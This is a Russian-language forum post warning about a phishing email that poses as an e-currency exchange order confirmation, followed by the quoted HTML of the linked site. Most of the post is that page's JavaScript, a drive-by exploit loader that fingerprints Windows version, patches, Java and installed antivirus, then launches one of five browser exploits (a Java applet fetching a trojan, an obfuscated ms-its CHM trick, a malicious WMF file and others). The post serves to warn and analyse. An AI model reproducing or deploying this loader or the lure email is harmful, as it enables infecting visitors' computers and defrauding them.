Всем привет! К нам на почту пришло следующее сообщение от order@speedy-exchange.com <speedy-exchange27@yandex.ru>:
-----------------------------
Dear, xxx@xxx.ru
Thank you for your Cash2Ecurrency Order.
This message is to confirm the successful posting of your order with the following data:
ORDER SUMMARY:
Order Identification Number: 7837571
Ecurrency Ordered: E-Gold
Exact Amount You Will Receive: 850 USD worth of E-Gold
Our Service Fee: 68.00 USD ( 8% )
Exact Amount We Have To Receive: 918.00 USD
E-Gold Account that we will fund: 1126589
PAYMENT METHOD: You have selected to transfer money to us using Bank Transfer
PAYER INFORMATION:
Name: Stanislav Rudnik
City: Moscow | Zip code: 215502
Country: Russia
Your contact email address: xxx@xxx.ru
You can view your order status here: www.speedy-exchange.com/orderstatus.html
Changes to this order can be made here: www.speedy-exchange.com/orderchange.html
================================================
Thank you for your appreciation and for using Speedy-Exchange.com.
www.speedy-exchange.com
---
-----------------------------
При заходе на www.speedy-exchange.com (якобы система обмена электронных валют) в зависимости от версии браузера загружается эксплойт. HTML-код следующий:
<BODY>
<DIV id=header><A
title="Speedy Exchange : Independent Electronic Gold Currency Exchanger | Featured Ecurrencies: E-Gold, 1MDC, Pecunix, E-Metal, E-Currency Featured Payment Methods: Bank transfer, Western Union, Credit Cards, ATM Debit Cards, Virtual Cards"
href="http://www.speedy-exchange.com"><IMG height=69
alt="Speedy Exchange : Independent Electronic Gold Currency Exchanger | Featured Ecurrencies: E-Gold, 1MDC, Pecunix, E-Metal, E-Currency Featured Payment Methods: Bank transfer, Western Union, Credit Cards, ATM Debit Cards, Virtual Cards"
src="img/speedyexchangelogo.gif" width=234 border=0></A>
<P></P></DIV><!-- end header -->
<DIV id=wrap><!-- content -->
<DIV id=content>
<DIV id=navlist>
<DIV id=left>
<H1></H1>
<p>Please, wait while page is loading...</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</DIV>
<DIV id=right>
<DIV id=bottom>
<DIV id=logolist></DIV><BR class=clear></DIV><!-- end bottom row --><!-- footer -->
<DIV id=footer>
<P></P>
<P class=endnote><A class=endnote
title="About Speedy Exchange : An Electronic Gold Currency Market Maker"
href="http://www.speedy-exchange.com">Speedy-Exchange.com |
Phone/Fax: +1-270-5740406 | Email: contact [at] speedy-exchange.com | ©
speedy-exchange.com 2003 - 2005</A> <BR>Speedy Exchange offers, and provides its
products and services as an independent third party unrelated to E-Gold,
OmniPay, Pecunix or any other company. All conditions, fees and charges are
subject to change without further notice. Western Union, E-Gold, Pecunix are
registered trademarks of their respective owners. </P></DIV><!-- end footer --><!-- end wrap --></DIV>
<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">
function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
{return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
else
{return Array(0,0,0,0);}
}
function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}
function Run_BOF()
{
self.focus();
for (i=1 ; i <=4 ; i++)
{
document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
}
document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');
}
var CGI_Script="http://www.speedy-exchange.com/cgi-bin/ie0601.cgi";
if (navigator.appName=="Microsoft Internet Explorer")
{
Click_Request=CGI_Script+"?click";
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);
var ExploitNumber=1;
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
for (var i=0; i < PatchList.length; i++)
{
ServicePack=PatchList[i];
j=ServicePack.indexOf('SP');
if (j != -1)
{
ServicePack=ServicePack.substr(j);
Click_Request=Click_Request+'&'+ServicePack;
}
}
StatPage.location=Click_Request;
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
try
{
var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization
fNortonAV=1;
}
catch(e){}
try
{
var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization
fMcAfee=1;
}
catch(e){}
switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
break;
case "XP":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
{
for (var i=0; i < PatchList.length; i++)
{
if (PatchList[i]=="SP2")
{ XP_SP2_patched=1; }
}
if (XP_SP2_patched==0)
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
}
else
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=5; }
else
{ ExploitNumber=4; }
}
}
break;
default:
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher
break;
}
// launching exploit which number is depends on Windows and IE versions
switch (ExploitNumber)
{
case 1:
Trojan_Path=CGI_Script+"?exploit=MS03-11";
ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1 height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';
break;
case 2:
CHM_base='//ie0601b.chm'+'::'+'/main.htm';
Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
document.body.appendChild(oMSITS);
document.title="Loaded !";
break;
case 3:
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0");
self.focus();
break;
case 4:
setTimeout('Run_BOF()',2000);
break;
case 5:
PageContainer.location="ie0601e.wmf";
break;
default:
break;
}
}
}
else
{
StatPage.location=CGI_Script+"?click";
}
</script>
</BODY>
---
|
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
